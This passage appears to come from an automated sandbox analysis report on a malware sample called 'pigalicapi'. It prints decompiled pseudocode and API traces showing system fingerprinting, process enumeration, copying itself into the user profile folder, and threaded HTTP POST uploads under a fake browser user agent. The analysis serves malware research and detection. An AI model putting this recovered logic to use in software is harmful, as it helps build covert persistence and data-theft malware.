                                                                                                                                                                                                                                                                          • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                          • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                          • Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                          • Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                          			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                          				HANDLE* _v64;
                                                                                                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                          				void _v92;
                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                          				HANDLE* _v104;
                                                                                                                                                                                                                                                                          				HANDLE* _v108;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                          				void* _t188;
                                                                                                                                                                                                                                                                          				void* _t189;
                                                                                                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                          					E04007D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                          					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                          					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          					_v16 = _a24;
                                                                                                                                                                                                                                                                          					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                          					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                          					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t198 = _v56;
                                                                                                                                                                                                                                                                          						if(_v56 != 0) {
                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						ResetEvent(_v20);
                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                          						_v56 = _t114;
                                                                                                                                                                                                                                                                          						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                          						_v64 = _v104;
                                                                                                                                                                                                                                                                          						E04007D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                          						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                          						_v100 = 0;
                                                                                                                                                                                                                                                                          						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                          							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                          							E04007D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                          							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                          							_v68 =  &_v56;
                                                                                                                                                                                                                                                                          							_v72 = _a12;
                                                                                                                                                                                                                                                                          							_v92 = _a4;
                                                                                                                                                                                                                                                                          							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                          							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                          								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          							_t141 = CreateThread(0, 0, E04004BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                          							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                          							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                          							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                          						if(_v96 == 0) {
                                                                                                                                                                                                                                                                          							_v5 = 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                          						if(_v96 != 0) {
                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						_v108 = _v64;
                                                                                                                                                                                                                                                                          						E040097C0(_v108);
                                                                                                                                                                                                                                                                          						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                          						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                          0x04004026
                                                                                                                                                                                                                                                                          0x0400402e
                                                                                                                                                                                                                                                                          0x0400405a
                                                                                                                                                                                                                                                                          0x0400405f
                                                                                                                                                                                                                                                                          0x04004066
                                                                                                                                                                                                                                                                          0x0400406f
                                                                                                                                                                                                                                                                          0x04004080
                                                                                                                                                                                                                                                                          0x04004086
                                                                                                                                                                                                                                                                          0x0400408a
                                                                                                                                                                                                                                                                          0x0400408d
                                                                                                                                                                                                                                                                          0x0400409f
                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                          0x040042bb
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 04004277
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 040042A6
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                          • Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                          • Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04005700(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                          				long _v560;
                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                          				long _v568;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0, _a4 + 0x100, 0x104); // executed
                                                                                                                                                                                                                                                                          					E04001CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                          					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                          					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                          					_t59 = E04005CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                          					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                          					E04007D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                          					_v28 = 0x207;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207); // executed
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                          					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v32 = _t67;
                                                                                                                                                                                                                                                                          					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                          						if(_v560 > 0) {
                                                                                                                                                                                                                                                                          							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          							_v564 = _t71;
                                                                                                                                                                                                                                                                          							if(_v564 != 0) {
                                                                                                                                                                                                                                                                          								_v568 = 0;
                                                                                                                                                                                                                                                                          								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                          								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                          									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                          									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04005709
                                                                                                                                                                                                                                                                          0x04005711
                                                                                                                                                                                                                                                                          0x04005729
                                                                                                                                                                                                                                                                          0x04005742
                                                                                                                                                                                                                                                                          0x04005756
                                                                                                                                                                                                                                                                          0x0400576e
                                                                                                                                                                                                                                                                          0x04005786
                                                                                                                                                                                                                                                                          0x04005798
                                                                                                                                                                                                                                                                          0x040057a3
                                                                                                                                                                                                                                                                          0x040057b8
                                                                                                                                                                                                                                                                          0x040057cc
                                                                                                                                                                                                                                                                          0x040057d4
                                                                                                                                                                                                                                                                          0x040057e4
                                                                                                                                                                                                                                                                          0x0400580a
                                                                                                                                                                                                                                                                          0x040057e6
                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                          0x0400582f
                                                                                                                                                                                                                                                                          0x04005854
                                                                                                                                                                                                                                                                          0x0400585a
                                                                                                                                                                                                                                                                          0x04005861
                                                                                                                                                                                                                                                                          0x04005873
                                                                                                                                                                                                                                                                          0x04005880
                                                                                                                                                                                                                                                                          0x04005896
                                                                                                                                                                                                                                                                          0x0400589c
                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                          0x040058ab
                                                                                                                                                                                                                                                                          0x040058d0
                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                          0x04005912
                                                                                                                                                                                                                                                                          0x040058e4
                                                                                                                                                                                                                                                                          0x040058ed
                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                          0x0400592c

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400591C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1116761331-4090404022
                                                                                                                                                                                                                                                                          • Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                          • Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 592 4001120-4001134 593 400113a-400113e 592->593 594 40012bb-40012c1 592->594 593->594 595 4001144-4001150 lstrlenA 593->595 595->594 596 4001156-4001162 lstrlenA 595->596 596->594 597 4001168-4001175 596->597 598 4001177-4001188 GetAllUsersProfileDirectoryA 597->598 599 400118a-400119b GetEnvironmentVariableA 597->599 600 40011a1-40011d9 wnsprintfA lstrcmpiA 598->600 599->600 601 4001216-4001287 call 40097a0 lstrcpyA * 2 CreateThread 600->601 602 40011db-40011e1 600->602 606 40012a3-40012b8 call 40097c0 601->606 607 4001289-400128d 601->607 602->601 603 40011e3-4001210 CopyFileA SetFileAttributesA lstrcpyA 602->603 603->601 606->594 609 400129a-40012a1 607->609 610 400128f-4001298 607->610 609->594 610->609
                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                          			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                          				void* _v288;
                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                          				void* _v560;
